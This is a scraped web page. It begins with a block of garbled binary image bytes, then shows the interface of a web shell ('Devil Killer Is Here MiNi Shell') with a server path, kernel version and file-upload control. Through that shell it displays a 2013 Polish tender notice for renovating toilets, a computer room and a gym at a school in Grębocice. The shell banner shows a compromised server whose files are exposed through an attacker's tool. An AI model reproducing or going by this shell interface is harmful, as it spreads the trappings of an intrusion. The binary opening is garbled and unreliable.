JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130325/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130325/116330-N-2013.html

<p class="kh_header"><b>Grębocice: Remont toalet, sali komputerowej i sali gimnastycznej w Szkole Podstawowej w Rzeczycy</b><br>
<b>Numer ogłoszenia: 116330 - 2013; data zamieszczenia: 25.03.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Ekonomiczno-Administracyjny Szkół i Przedszkola , ul. Szkolna 2/2-3, 59-150 Grębocice, woj. dolnośląskie, tel. 0-76 8315067, faks 0-76 8315067.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bazagmin.pl/zeas</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont toalet, sali komputerowej i sali gimnastycznej w Szkole Podstawowej w Rzeczycy.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie robót budowlanych m.in.
-Remont pracowni komputerowej- wykonanie bruzd ( rysunek nr 3) szpachlowanie, gładzenie ścian i sufitów, malowanie farbami emulsyjnymi i olejnymi kolory do uzgodnienia wg RAL i wg projektu graficznego(rysunek nr 4), wymiana opraw oświetleniowych (oprawa rastrowa), wymiana gniazd i wyłączników, wymiana umywalki wraz z syfonami i bateriami, ułożenie wykładzin podłogowych zgrzewalnych z tworzyw sztucznych wraz z przygotowaniem podłoża + cokół 10 cm. Kolorystykę wybiera Zamawiający. 
-Remont toalet: dziewcząt i  chłopców zakres robót obejmuje m.in
a) roboty rozbiórkowe -  armatury sanitarnej, elementów elektrycznych, drzwi wraz  z ościeżnicami,  ścianek działowych kabin
b) roboty ogólnobudowlane - wykonanie gładzi na ścianach i sufitach, ułożenie płytek ceramicznych, montaż kabin, montaż stolarki drzwiowej
c) roboty malarskie - malowanie ścian i sufitów
d) roboty instalacyjne w zakresie instalacji wod-kan.- wymiana instalacji wodociągowej i kanalizacyjnej, wymiana muszli
e) roboty w zakresie wentylacji c.o. - montaż urządzeń wentylacyjnych, montaż grzejników
f) roboty instalacyjne w zakresie instalacji elektrycznej - wykucie bruzd i ułożenie przewodów montaż puszek, wyłączników, gniazd i opraw żarowych.
- Montaż drzwi do gabinetu pedagoga-wykucie otworu drzwiowego i montaż skrzydeł drzwi
-Remont sali gimnastycznej- cyklinowanie, malowanie linii boiska i lakierowanie parkietu sali gimnastycznej.

Wymagane parametry wykładzin nie mogą być gorsze niż:
- wykładzina homogeniczna ścieralna na całej swojej grubości
-  grubość całkowita 2 mm
- klasa ścieralności: T
- wykładzina bezkierunkowa
-posiada atest higieniczny oraz dokumenty potwierdzające: trudnopalność, antypoślizgowość, 
-karty techniczne wyrobów planowanych do wykonania posadzki (grunt, masa samopoziomująca, klej, wykładzina). Wykładzina powinna mieć przeznaczenie do wszelkich pomieszczeń o najwyższym natężeniu ruchu w tym do obiektów szkolnych
Wymaga się udzielenia 10-letniej gwarancji na wykładzinę, na pozostałe roboty budowlane Wykonawca udzieli minimum 3-letniej gwarancji.
Wszelkie materiały wykorzystane do realizacji zadania powinny odpowiadać warunkom jakościowym zgodnym z  obowiązującymi atestami i normami
Szczegółowy opis określonego powyżej przedmiotu zamówienia zawiera dokumentacja techniczna wraz ze specyfikacją techniczną oraz przedmiarem robót, stanowiących załącznik  do niniejszej specyfikacji.
Pominięcie jakiejkolwiek pozycji z kosztorysu ofertowego przy wycenie i nie ujęcie jej w cenie ofer-towej nie może stanowić podstawy żądania dodatkowego wynagrodzenia z powyższego tytułu, a prace wymienienie w tej pozycji będą podlegały wykonaniu w ramach ceny ofertowej.
W przypadku, gdy termin ważności polisy, upływa przed terminem zakończenia robót objętych ni-niejszym zamówieniem, wówczas wybrany Wykonawca zobowiązany będzie do przedstawienia Zamawiającemu nowej polisy przed upływem ważności polisy poprzedniej. Nie dokonanie powyż-szego będzie stanowiło podstawę do wstrzymania robót z dniem upływu ważności polisy i naliczania kar umownych za spowodowanie przerwy w realizacji zamówienia z przyczyn zależnych od Wyko-nawcy do czasu przedstawienia Zamawiającemu nowej polisy.
Zamawiający nie dopuszcza do częściowego fakturowania i udzielenie Wykonawcy zaliczki .
Odbioru końcowego przedmiotu zamówienia dokona Zamawiający i wyznaczeni przez Zamawiają-cego przedstawiciele w obecności Wykonawcy, kierownika budowy i inspektora nadzoru inwestor-skiego, w ciągu 7 dni od daty pisemnego zgłoszenia ich do odbioru, przy czym zgłoszenie to musi być potwierdzone przez inspektora nadzoru inwestorskiego, iż roboty zostały wykonane zgodnie z dokumentacją przetargową i umową oraz bez wad. Do zgłoszenia zakończenia robót Wykonawca załącza dokumenty wymagane ustawami i wydanymi na ich podstawie przepisami wykonawczymi. 
Brak wymaganych dokumentów lub też brak potwierdzenia przez inspektorów  nadzoru inwestor-skiego,  że przedmiot zamówienia został wykonany zgodnie z dokumentacją budowy i umową oraz bez wad spowoduje nie przystąpienie przez Zamawiającego do odbioru końcowego.
Podstawą wystawienia faktury końcowej jest podpisany przez Zamawiającego i wyznaczonych przez niego przedstawicieli w obecności inspektora nadzoru inwestorskiego, kierownika budowy i Wyko-nawcy protokół końcowego odbioru przedmiotu zamówienia.

Zamawiający zaleca Wykonawcom dokonanie wizji lokalnej na obiekcie celem zdobycia wszelkich danych i informacji niezbędnych do należytego wykonania zamówienia i dokonać własnych pomiarów i analiz porównawczych. W tym celu należy się skontaktować  z osobą upoważnioną do kontaktów (rozdział 8 pkt.5 niniejszej specyfikacji) celem ustalenia terminu wizyty..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje w okresie 3 lat od udzielenia zamówienia podstawowego udzielenia zamówienia uzupełniającego, o którym mowa w art. 67 ust. 1 pkt. 6 ustawy. Przedmiotem zamówień uzupełniających mogą być roboty budowlane polegające na powtórzeniu tego samego rodzaju zamówienia, co przewidziane w zamówieniu podstawowym. Zamówienia uzupełniające mogą stanowić nie więcej niż 50% wartości zamówienia uzupełniającego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.43.12.00-9, 45.44.21.99-8, 45.45.30.00-7, 45.42.10.00-4, 45.31.10.00-0, 45.31.11.41-4, 45.33.00.00-9, 45.34.00.00-4, 45.45.00.00-6, 45.43.21.11-5, 45.11.12.20-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 30.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 9.1. Wysokość wadium. Każda oferta musi być zabezpieczona wadium w
wysokości: 2 000,00 PLN 9.2. Formy wadium Wadium może być wniesione w jednej lub kilku następujących
formach a)pieniądzu, b)poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowokredytowej,
z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym, c)gwarancjach bankowych, d)
gwarancjach ubezpieczeniowych, e)poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust.
5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. Nr
109, poz. 1158, z późn. zm.) 9.3. Sposób i miejsce składania wadium. 1.Wadium w formie pieniężnej należy
wpłacić przelewem na rachunek bankowy zamawiającego Bank Spółdzielczy Wschowa O Grębocice, Nr
rachunku 20 8669 0001 2017 0172 4343 0002 z adnotacją Wadium - nr sprawy Kopię dokumentu
potwierdzającego wniesienie wadium można dołączyć do oferty. 2.Wadium wnoszone w formie innej niż
pieniężna, należy złożyć w formie oryginału do depozytu w KASIE (w godzinach 8:00 do 13:00) znajdującej
się w siedzibie Zamawiającego tj. ul. Szkolna 2/2- 3, 59-150 Grębocice lub złożyć wraz z ofertą (w jednej
kopercie). Nie należy trwale dołączać (spinać) oryginału dokumentu wadialnego do oferty - w takim przypadku
do oferty należy załączyć także potwierdzoną za zgodność z oryginałem kserokopię. 3.Z treści gwarancji
(poręczenia) musi jednoznacznie wynikać a) jaki jest sposób reprezentacji gwaranta. Gwarancja musi być
podpisana przez upoważnionego (upełnomocnionego) przedstawiciela gwaranta. Podpis winien być
sporządzony w sposób umożliwiający jego identyfikację np. złożony wraz z imienną pieczątką lub czytelny (z
podaniem imienia i nazwiska). b)bezwarunkowe, na każde pisemne żądanie zgłoszone przez zamawiającego
w terminie związania ofertą, zobowiązanie gwaranta do wypłaty zamawiającemu pełnej kwoty wadium w
okolicznościach określonych w art. 46 ust. 4a i 5 ustawy Prawo zamówień publicznych. 9.4. Termin wniesienia
wadium. 1.Wadium musi być wniesione przed upływem terminu składania ofert. tj. do dnia 08.04.2013 r. do
godz. 10 00 2.Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli w podanym terminie znajdzie się na
rachunku bankowym zamawiającego. 3.Wykonawca, który nie wniesie wadium lub nie zabezpieczy oferty
ustawową formą wadium zostanie wykluczony z postępowania z mocy art.24 ust.2. pkt.2 ustawy, a jego oferta
zgodnie z art.24 ust.4. zostanie uznana za odrzuconą. 9.5. Zwrot zatrzymanie wadium. 1.Zamawiający zwróci
wadium wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu
postępowania, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z
zastrzeżeniem pkt. 2, 2.Zamawiający zatrzyma wadium wraz z odsetkami wykonawcy, który w odpowiedzi na
wezwanie, o którym mowa w art 26 ust 3 ustawy, nie złoży dokumentów lub oświadczeń, o których mowa w
pkt.6.3 oraz w pkt.7 specyfikacji, chyba że wykonawca udowodni, że nieuzupełnienie wynika z przyczyn
nieleżących po jego stronie. 3.Jeżeli w wyniku rozstrzygnięcia odwołania, oferta wykonawcy, któremu
zwrócono wadium, zostanie wybrana jako najkorzystniejsza, będzie on wezwany do ponownego wniesienia
wadium w terminie określonym przez zamawiającego pod rygorem wykluczenia go z postępowania z mocy
art.24 ust.2. pkt.2. 4.Wykonawcy, którego oferta zostanie wybrana jako najkorzystniejsza, zamawiający zwróci
wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia
należytego wykonania umowy. 5.Zamawiający niezwłocznie dokona zwrotu wadium na wniosek wykonawcy,
który wycofał ofertę przed upływem terminu składania ofert. 6.Wadium wykonawcy, którego oferta została
wybrana, zostanie zatrzymane wraz z odsetkami w przypadku, gdy wykonawca a)odmówi podpisania umowy
na warunkach określonych w ofercie, b)nie wniesie zabezpieczenia należytego wykonania umowy, c)zawarcie umowy stanie się niemożliwe z przyczyn leżących po stronie wykonawcy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunek dotyczący posiadania wiedzy i doświadczenia niezbędnych do wykonania przedmiotowego zamówienia wówczas, gdy wykaże się on doświadczeniem polegającym na wykonaniu w okresie ostatnich pięciu lat a jeżeli okres działalności jest krótszy w tym okresie, robót budowlanych odpowiadających podobnym przedmiotem zamówienia tj. należytą realizacją co najmniej 3 zamówień polegających na wykonaniu remontu kompleksowego łazienek, oraz wykonaniu co najmniej 3 zamówień dotyczących ułożenia wykładzin podłogowych zgrzewalnych z tworzyw sztucznych oraz robót budowlanych w których zakres wchodzi ogólny remont w zakresie co najmniej takim jaki dotyczy niniejszego zamówienia. Informacja powyższa winna wynikać z żądanych przez zamawiającego dokumentów rozdział 7 specyfikacji potwierdzających, że roboty te zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Aby potwierdzić warunek dotyczący dysponowania osobami zdolnymi do wykonania zamówienia, Wykonawca winien wykazać, że w okresie realizacji zamówienia będzie dysponował co najmniej jedną osobą posiadającą uprawnienia do wykonywania samodzielnych funkcji w budownictwie w rozumieniu ustawy z dnia 7 lipca 1994r. Prawo budowlane (tekst jednolity: Dz. U. 2006, Nr 156, poz. 1118 ze zm.), w zakresie kierowania robotami budowlanymi, posiadającą zaświadczenie o członkostwie we właściwej izbie samorządu zawodowego aktualne w terminie składania ofert w niniejszym postępowaniu</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełniania warunku udziału w postępowaniu w zakresie sytuacji ekonomicznej wykonawca winien wykazać, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę, co najmniej 200 000 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>wypełnionione załączniki stanowiące załącznik do SIWZ b) pełnomocnictwo podmiotów
występujących wspólnie (jeżeli dotyczy), c) pełnomocnictwo dla osoby/osób podpisującej ofertę i
oświadczenia (jeśli uprawnienie tych osób nie wynika z innych dokumentów dołączonych do oferty), d)
kosztorys ofertowy wypełniony sporzadzony na podstawie dokumentacji przetargowej e) akceptacja projektu
umowy wypełniona</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W przypadkach przewidzianych w umowie dopuszcza się wprowadzanie zmian za zgodą zamawiającego. 2.
Zmiany przewidziane w umowie mogą być inicjowane: 1) przez zamawiającego, 2) przez wykonawcę. 3.
Zmiany umowy, o których mowa w ust.1 muszą być dokonywane z zachowaniem przepisu art. 140 ust. 3
PZP, stanowiącego, że umowa podlega unieważnieniu w części wykraczającej poza określenie przedmiotu
zamówienia zawarte w SIWZ. 4. Zmiany, o których mowa w ust. 1 mogą dotyczyć: 1) poprawy jakości lub
innych parametrów charakterystycznych dla objętego proponowaną zmianą elementu robót budowlanych lub
zmiany technologii na korzystniejszą, nowocześniejszą, tańszą niż określona w SIWZ 2) aktualizacji
rozwiązań projektowych z uwagi na postęp technologiczny lub zmianę obowiązujących przepisów, 3)
wprowadzenie do dokumentacji projektowej zmian, o których mowa w art. 36a ust. 5 ustawy z dnia 7 lipca
1994 r. Prawo budowlane (Dz. U. z 2006 r. Nr 156 poz. 1118 z późn. zm.). wymagających zgody projektanta
4) zmiany producenta urządzeń lub wyposażenia , 5) zmiany wymiarów, położenia lub wysokości elementów
związanych z robotą budowlaną, 6) zmiany w kolejności i terminach wykonywania robót budowlanych
niemożliwych do przewidzenia w chwili zawierania umowy 7) zmiany ilości robót budowlanych, usług lub
dostaw w stosunku do przedmiaru mieszczących się jednak w opisie przedmiotu zamówienia, 8) konieczności
zmiany terminu wykonania przedmiotu umowy w przypadku: 1. konieczności wykonania robót dodatkowych w
rozumieniu art.67 ust.1. pkt.5 ustawy warunkujących wykonanie przedmiotu zamówienia. 2. wstrzymania
wykonywania całości lub części robót na skutek wystąpienia okoliczności niezależnych od wykonawcy 3. nie
sprzyjających warunków atmosferycznych uniemożliwiających wykonywanie prac na zewnątrz - powyższebędzie możliwe pod warunkiem potwierdzenia przez inspektora nadzoru w dokumentacji wystąpienia
okoliczności uzasadniających zmianę terminu. 9) uzasadnionej rezygnacji z wykonania części robót
budowlanych w wyniku zmian wprowadzonych do dokumentacji . 10) zmiana kierownika budowy lub
kierowników robót. Warunkiem zmiany będzie posiadanie przez nowego kierownika uprawnień budowlanych
takich jak kierownik budowy wskazany w ofercie. 11) zmiana podwykonawcy robót wskazanych w ofercie, pod
warunkiem uzyskania zgody zamawiającego na zatrudnienie nowego podwykonawcy 5. Jeżeli zmiana, o
której mowa w ust. 4 pkt.3 wymaga zmiany dokumentacji projektowej lub specyfikacji technicznych wykonania
i odbioru robót budowlanych, strona inicjująca zmianę przedstawia projekt zamienny zawierający opis
proponowanych zmian oraz niezbędne rysunki. Projekt taki wymaga akceptacji nadzoru autorskiego i
zatwierdzenia do realizacji przez zamawiającego. 6. Warunkiem dokonania zmian, o których mowa w ust. 4
jest złożenie wniosku przez stronę inicjującą zmianę zawierającego: 1) opis propozycji zmiany , 2)
uzasadnienie zmiany, 3) obliczenie kosztów zmiany zgodnie z zasadami określonymi w umowie, jeżeli zmiana
będzie miała wpływ na wynagrodzenie wykonawcy, 4) opis wpływu zmiany na harmonogram robót i termin
wykonania umowy. 7. Uzasadnienie zmiany, o którym mowa w ust. 6 pkt. 2 może dotyczyć: 1) obniżenia
kosztu wykonania robót lub kosztu eksploatacji (użytkowania) obiektu, 2) poprawy wartości lub podniesienia
sprawności ukończonych robót budowlanych, 3) podniesienia wydajności urządzeń, 4) podniesienia
bezpieczeństwa wykonywania robót, 5) usprawnienia w trakcie użytkowania obiektu, 6) opóźnienia,
utrudnienia, zawieszenia robót lub przeszkód spowodowanych przez zamawiającego lub dających się
przypisać zamawiającemu, personelowi zamawiającego; lub innemu wykonawcy, zatrudnionemu przez
zamawiającego do innych czynności w miejscu realizacji zamówienia, 7) zaistnienia nieprzewidzianych w
umowie warunków geologicznych, hydrogeologicznych, wykopalisk, wyjątkowo niekorzystnych warunków
klimatycznych, a także innych przeszkód lub skażeń uniemożliwiających kontynuowanie umowy na
